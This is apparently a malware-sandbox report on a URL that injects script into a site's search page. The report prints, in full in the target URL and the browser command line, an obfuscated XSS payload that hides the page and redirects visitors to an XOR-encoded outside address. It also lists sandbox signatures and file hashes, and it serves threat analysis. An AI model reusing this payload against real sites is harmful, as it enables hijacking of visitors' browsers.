Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-es -
resource tags
-
submitted
24/05/2024, 17:21
General
-
Target
https://kollitaxi.no/?s=2%3E%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C93%2C66%2C94%2C79%2C68%2C92%2C70%2C90%2C79%2C4%2C73%2C69%2C71%2C5%2C75%2C73%2C126%2C73%2C70%2C24%2C65%2C126%2C71%2C122%2C121%2C96%2C67%2C117%2C102%2C78%2C117%2C71%2C66%2C90%2C102%2C82%2C18%2C31%2C79%2C71%2C101%2C89%2C28%2C97%2C77%2C92%2C68%2C95%2C122%2C105%2C68%2C24%2C27%2C115%2C109%2C83%2C109%2C73%2C117%2C124%2C28%2C88%2C7%2C117%2C122%2C99%2C114%2C31%2C30%2C30%2C120%2C27%2C72%2C31%2C115%2C68%2C67%2C109%2C109%2C108%2C92%2C107%2C110%2C98%2C29%2C109%2C66%2C100%2C103%2C68%2C127%2C99%2C126%2C79%2C79%2C124%2C28%2C78%2C93%2C123%2C84%2C84%2C5%2C27%2C29%2C5%2C18%2C29%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E63%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu%22%20target%3D%22_blank%22%3E%28%3EYc%2CKfB_Mi8E%2317Fx8%28%2F%3Cimg%20src%3D%22cq_%2A48%21L328%5EJC%3A9a%40fP9U%3ATxGw%3Dve%5C%22%20alt%3D%22imagehost%22%3E%3Cbr%3E%3Ca%20href%3D%22xu%26z8V2NR%40gR%2A%26Ax%21%3DL-5%22%3E8PVE%5Cauq%23%5E%40GXQUk3%3BPW%26%27tLH%3FBB%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C93%2C66%2C94%2C79%2C68%2C92%2C70%2C90%2C79%2C4%2C73%2C69%2C71%2C5%2C75%2C73%2C126%2C73%2C70%2C24%2C65%2C126%2C71%2C122%2C121%2C96%2C67%2C117%2C102%2C78%2C117%2C71%2C66%2C90%2C102%2C82%2C18%2C31%2C79%2C71%2C101%2C89%2C28%2C97%2C77%2C92%2C68%2C95%2C122%2C105%2C68%2C24%2C27%2C115%2C109%2C83%2C109%2C73%2C117%2C124%2C28%2C88%2C7%2C117%2C122%2C99%2C114%2C31%2C30%2C30%2C120%2C27%2C72%2C31%2C115%2C68%2C67%2C109%2C109%2C108%2C92%2C107%2C110%2C98%2C29%2C109%2C66%2C100%2C103%2C68%2C127%2C99%2C126%2C79%2C79%2C124%2C28%2C78%2C93%2C123%2C84%2C84%2C5%2C27%2C29%2C5%2C18%2C29%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E42%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu
Malware Config
Signatures
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 26 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://kollitaxi.no/?s=2%3E%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C93%2C66%2C94%2C79%2C68%2C92%2C70%2C90%2C79%2C4%2C73%2C69%2C71%2C5%2C75%2C73%2C126%2C73%2C70%2C24%2C65%2C126%2C71%2C122%2C121%2C96%2C67%2C117%2C102%2C78%2C117%2C71%2C66%2C90%2C102%2C82%2C18%2C31%2C79%2C71%2C101%2C89%2C28%2C97%2C77%2C92%2C68%2C95%2C122%2C105%2C68%2C24%2C27%2C115%2C109%2C83%2C109%2C73%2C117%2C124%2C28%2C88%2C7%2C117%2C122%2C99%2C114%2C31%2C30%2C30%2C120%2C27%2C72%2C31%2C115%2C68%2C67%2C109%2C109%2C108%2C92%2C107%2C110%2C98%2C29%2C109%2C66%2C100%2C103%2C68%2C127%2C99%2C126%2C79%2C79%2C124%2C28%2C78%2C93%2C123%2C84%2C84%2C5%2C27%2C29%2C5%2C18%2C29%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E63%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu%22%20target%3D%22_blank%22%3E%28%3EYc%2CKfB_Mi8E%2317Fx8%28%2F%3Cimg%20src%3D%22cq_%2A48%21L328%5EJC%3A9a%40fP9U%3ATxGw%3Dve%5C%22%20alt%3D%22imagehost%22%3E%3Cbr%3E%3Ca%20href%3D%22xu%26z8V2NR%40gR%2A%26Ax%21%3DL-5%22%3E8PVE%5Cauq%23%5E%40GXQUk3%3BPW%26%27tLH%3FBB%3Ciframe%20src%3Djavascript%3A%2F%2Afd7%C2%A7Other.everywhere1%5Dforiginal%C2%A7style%2A%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C93%2C93%2C93%2C4%2C93%2C66%2C94%2C79%2C68%2C92%2C70%2C90%2C79%2C4%2C73%2C69%2C71%2C5%2C75%2C73%2C126%2C73%2C70%2C24%2C65%2C126%2C71%2C122%2C121%2C96%2C67%2C117%2C102%2C78%2C117%2C71%2C66%2C90%2C102%2C82%2C18%2C31%2C79%2C71%2C101%2C89%2C28%2C97%2C77%2C92%2C68%2C95%2C122%2C105%2C68%2C24%2C27%2C115%2C109%2C83%2C109%2C73%2C117%2C124%2C28%2C88%2C7%2C117%2C122%2C99%2C114%2C31%2C30%2C30%2C120%2C27%2C72%2C31%2C115%2C68%2C67%2C109%2C109%2C108%2C92%2C107%2C110%2C98%2C29%2C109%2C66%2C100%2C103%2C68%2C127%2C99%2C126%2C79%2C79%2C124%2C28%2C78%2C93%2C123%2C84%2C84%2C5%2C27%2C29%2C5%2C18%2C29%2C%5D%3B%2F%2Afwef%5B~7el~wefwef%C2%A73000zwefwef%C2%A73000zb%2A%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map%28value%3D%60%2BString.fromCharCode%2862%29%2B%60String.fromCharCode%28value%5E42%29%29.jo%60%2B%60in%28%27%27%29.concat%28%27%23%27%29%3B%2F%2Achw%C2%A7%C2%A7%C2%A7chw.toUpUpDown%28%29%2A%2F%60%3BcodeString%3DcodeString.replaceAll%28%60salooa%60%2C%60azefcr%60%29%3BexecuteCode%3DFunction%28codeString%29%3B%2F%2Athat~ovrir~sleep.over%C2%A7%2A%2FexecuteCode%28%29%3B%2F%2A%C2%A7max.do%28%29%2A%2F%3E%3C%2Fiframe%3E%3Fy%20menu1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xb4,0x108,0x7ffd2dcfab58,0x7ffd2dcfab68,0x7ffd2dcfab782⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=296 --field-trial-handle=1844,i,15301535925468104581,9998315482704190439,131072 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1844,i,15301535925468104581,9998315482704190439,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2256 --field-trial-handle=1844,i,15301535925468104581,9998315482704190439,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2900 --field-trial-handle=1844,i,15301535925468104581,9998315482704190439,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2908 --field-trial-handle=1844,i,15301535925468104581,9998315482704190439,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4280 --field-trial-handle=1844,i,15301535925468104581,9998315482704190439,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1724 --field-trial-handle=1844,i,15301535925468104581,9998315482704190439,131072 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3280 --field-trial-handle=1844,i,15301535925468104581,9998315482704190439,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3284 --field-trial-handle=1844,i,15301535925468104581,9998315482704190439,131072 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1012 --field-trial-handle=1844,i,15301535925468104581,9998315482704190439,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
216B
MD508477ee7c1340510a3a012e73fe80866
SHA1a6d48de62b522bdfdb9aef2c80e746335ec6375b
SHA256b6c97770fb02884778aa0fd4e0b41b862e2e8e7fa293dae562f8d8359b3f42d8
SHA512975a416af482fef9667e19079d9d5afbd77c17caa4d99cf64f0d29e8ed30069a5cc5beb6976b7bba63ef666398aa757e2bb4d521c6654d134cb870a4155786cb
-
Filesize
1KB
MD5106b0c2f32593daebb1ce4f51dbd40d5
SHA13057cb29fbf515745d1ca35dfd68e2ebb22bb663
SHA256a244873a4d5235f5b67fbbb52a54f9201480fd742a3eb1f808e3ce0722f87569
SHA5125f33dd92896dd6dfe3d401a0083f5b2d0cb134504aa7b9caa91556d6ca7648a0e56d33aa13e99b1d1ddf6c45860f133832f991d5c8da73dd84375a23ef9a990a
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
687B
MD5fd26b53e58c55a24b1b478a286e23e71
SHA161f5a3651b7be608b583946fa3c553e0429c5b2e
SHA256ca98e8afa800dd199783cd06d9d7667088d1b4088aaf6561223b731394926e73
SHA5129f19e46b75c30091ad8dd3dccbdcc6d7fac94f456b8e60df3ab68a49fe2502c164071fbff629220377ae6f90a66ba0de9fdbbdef763f10c334e9c2bc7cb8c238
-
Filesize
7KB
MD52438dcd37775d136dc63b5efcb9c7101
SHA13338098b91a12a4958ec252eb1f6cf8dea90a234
SHA256c98f039ab4dba0526745195c2c7802460b87aa99b24d8cafc56e0a24881bc06a
SHA512e7dd7bec389e2ca995d47d10bee616a9cb3d92987368283ab4eee2e9c4d6aa4efcdcd8690865b7edc33dcc349d0861671dae334342fd72db6a2575f2168cab81
-
Filesize
130KB
MD5b7641f7f12b8e102817dfed09f71ded2
SHA10109ec0d75542c55f446603c8bf765f472cfdecd
SHA25640229b319471865d1a59d8e90cbc59de58a280ffd9515a5ac1bf3fd29529bafb
SHA5125d9744fbf331791b134c4ff0c6c164503d8a2b8cb943ed5b7e0235c225c557864863c4eaa7014138247a1813657c15136f89219c5fc7595984ec25089bb3cac3